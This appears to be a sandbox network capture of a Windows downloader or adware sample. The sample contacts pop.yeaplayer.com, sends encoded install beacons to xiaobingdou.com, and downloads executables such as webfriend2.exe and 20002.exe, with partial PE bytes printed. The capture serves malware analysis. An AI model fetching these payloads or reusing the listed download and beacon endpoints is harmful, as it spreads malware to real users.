Date: Wed, 16 Aug 2017 14:40:39 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:31 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:30 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /data/webfriend2.exe HTTP/1.1

User-Agent: Agent386664

Host: quadratempbayinfo.com

Cache-Control: no-cache


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:09 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

....

GET /data/exefiles/webfriend1502893460.exe HTTP/1.1

User-Agent: Agent386664

Host: quadratempbayinfo.com

Cache-Control: no-cache

Connection: Keep-Alive


HTTP/1.1 200 OK

Last-Modified: Wed, 16 Aug 2017 14:24:28 GMT

Content-Type: application/x-msdownload

Content-Length: 1350814

Date: Wed, 16 Aug 2017 14:41:09 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: Keep-Alive

MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................P............
@......@..............................|.... ...,......................
......................................................................
..............CODE................................ ..`DATA....P.......
....................@...BSS......................................idata
..|...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc....,... ...,..................@..P.............P..
....................@..P..............................................
......................................................................
..............................................string................&l
t;.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance.
.L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameI
s...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsF
rom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NUFDNTZFRUJDNEUyNTQzODNFODA2QjQ0RkMwRUE0RDE2NUQ0MUI0QjQwMDRCNUFFQzg4RTIzMkY5QTI5NTg4NTI3RjBGNzgyNjAxNkFCQTg1RkUwRjQ1MDdBQTY2QTM5RQ== HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:30 GMT

Connection: close

Content-Length: 0

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:42 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:21 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:31 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f3a7b683f4-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRURBOTFGNTNDNDFBMEVDRDk0ODkwODc3NUMxMTJCQjU5QUIwODVGOEZBRkVBNEQ0NzdCNTFCNEU3MTE1NEMzOEJENTc0ODE3ODFDRjAxNDM3QTE2MTRGN0I5NEZERUJEQTRBM0I1N0M4NDI2RjU0RjE3MDU5OTkwNTQ3RTY0OTM2MTA3MjIyRkY1NjYwMzlDQzY0NDIxNUE4RDkxNTJGQ0Y5 HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:31 GMT

Connection: close

Content-Length: 0

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:25 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUVFMzdBRDBCQTFDQkU1QTVDN0ZGRTAyN0YxNTYwM0VDMTI3MzZCODNCQTgyQzM5RDJERjBDMDdENTUyODAyNjQxRTNGRTZDRjlEMDcxNzNCMTBFM0Q0RkJFNDYwRjE3Qg== HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:29 GMT

Connection: close

Content-Length: 0

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:35 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:29 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:23 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /20002.exe HTTP/1.1

User-Agent: Agent336712

Host: dl-o.1haitao.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/x-msdownload

Content-Length: 1339016

Connection: keep-alive

Date: Wed, 16 Aug 2017 14:05:07 GMT

x-oss-request-id: 59945113F4D4EC5D03C6CFF9

Accept-Ranges: bytes

ETag: "680D0B8CE81A562A0C5D5BD98FCA3B04"

Last-Modified: Tue, 08 Aug 2017 06:29:07 GMT

x-oss-object-type: Normal

x-oss-hash-crc64ecma: 2922808158989109942

x-oss-storage-class: Standard

Content-MD5: aA0LjOgaVioMXVvZj8o7BA==

x-oss-server-time: 1

Via: cache34.l2de1[459,304-0,H], cache35.l2de1[2796,0], cache3.de1[0,200-0,H], cache9.de1[1,0]

Age: 2113

X-Cache: HIT TCP_MEM_HIT dirn:0:761339685

X-Swift-SaveTime: Wed, 16 Aug 2017 14:05:07 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: c31b1fd115028944204644535e

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........0(..QF..QF.
.QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...i:
.V.................^..........l2.......p....@.........................
.................................................t..........(.........
..8"..PL...........................................................p..
|............................text...t\.......^.................. ..`.r
data.......p.......b..............@..@.data...X............t..........
....@....ndata.......P...........................rsrc...(............z
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h?B..H.P.u..u..u....q@..B...SV.5p?B..E.WP.u....q@..e...E..E.P.u....q@
..}..e....Pp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u....r@..u
....E..9}...w....~X.te.v4..Hp@....E.tU.}.j.W.E......E.......Dp@..vXW..
Lp@..u..5@p@.W...E..E.h ...Pj.h`7B.W...r@..u.W...u....E.P.u...Pr@._^3.
[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /20002.exe HTTP/1.1

User-Agent: Agent350596

Host: dl-o.1haitao.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/x-msdownload

Content-Length: 1339016

Connection: keep-alive

Date: Wed, 16 Aug 2017 14:05:07 GMT

x-oss-request-id: 59945113F4D4EC5D03C6CFF9

Accept-Ranges: bytes

ETag: "680D0B8CE81A562A0C5D5BD98FCA3B04"

Last-Modified: Tue, 08 Aug 2017 06:29:07 GMT

x-oss-object-type: Normal

x-oss-hash-crc64ecma: 2922808158989109942

x-oss-storage-class: Standard

Content-MD5: aA0LjOgaVioMXVvZj8o7BA==

x-oss-server-time: 1

Via: cache34.l2de1[459,304-0,H], cache35.l2de1[2796,0], cache3.de1[0,200-0,H], cache9.de1[1,0]

Age: 2126

X-Cache: HIT TCP_MEM_HIT dirn:0:761339685

X-Swift-SaveTime: Wed, 16 Aug 2017 14:05:07 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: c31b1fd115028944334598834e

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........0(..QF..QF.
.QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...i:
.V.................^..........l2.......p....@.........................
.................................................t..........(.........
..8"..PL...........................................................p..
|............................text...t\.......^.................. ..`.r
data.......p.......b..............@..@.data...X............t..........
....@....ndata.......P...........................rsrc...(............z
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h?B..H.P.u..u..u....q@..B...SV.5p?B..E.WP.u....q@..e...E..E.P.u....q@
..}..e....Pp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u....r@..u
....E..9}...w....~X.te.v4..Hp@....E.tU.}.j.W.E......E.......Dp@..vXW..
Lp@..u..5@p@.W...E..E.h ...Pj.h`7B.W...r@..u.W...u....E.P.u...Pr@._^3.
[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:40 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:26 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /reportInstallaaFinish.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUVFMzdBRDBCQTFDQkU1QTVDN0ZGRTAyN0YxNTYwM0VDMTI3MzZCODNCQTgyQzM5RDJERjBDMDdENTUyODAyNjQxRTNGRTZDRjlEMDcxNzNCMTBFM0Q0RkJFNDYwRjE3Qg== HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:42 GMT

Connection: close

Content-Length: 0

